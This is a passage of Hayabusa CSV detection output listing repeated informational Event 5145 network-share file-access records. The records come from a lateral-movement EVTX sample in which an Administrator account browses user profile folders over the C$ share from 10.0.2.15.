10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos\desktop.ini : IP Address: 